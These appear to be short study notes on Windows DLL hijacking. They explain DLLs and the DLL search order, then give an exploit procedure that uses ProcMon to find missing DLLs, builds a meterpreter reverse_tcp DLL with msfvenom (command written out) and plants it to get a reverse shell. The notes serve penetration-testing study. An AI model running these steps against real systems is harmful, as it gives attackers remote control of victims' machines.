#### DLL Hijacking

- Dll (Dynamic link Library):- DLL files hold executable codes that can be used by other applicaton. it Act as a Library which contain codes. (Folder5 video7)
- When applicarion need to use the DLL file but if the absolute path is not provided the application start searching for thid DLL. If attacker can replace his malicouis DLL with the same name the target application is looking for. It may load and execute attacker's malicouis DLL. 

#### DLL load Order:
- the directory from which the application is loaded.
- The current directory
- the system directory (C:\\windows\\system32\\)
- the 16-bit system directory
- the windows directory
- the directory that are listes in the PATH environment variable.

#### Exloit:- 
1. open ProcMon and set filters. "Process name is ABC.exe", "Path Ends with dll", "Result is name not found"
2. launch the target application. Check for intrested file.
3. Create a malicious DLL using msfvenom. (msfvenom -p windows/meterpreter/reverse_tcp LHOST-4444 -a x86 -f dll > file.dll)
4. forward dll file to the windows machine.
5. Paste the dll file where the application is searching for this dll file. (found using ProcMon)
6. set listner in attacker machine.
7. start the application and wait for reverse shell.
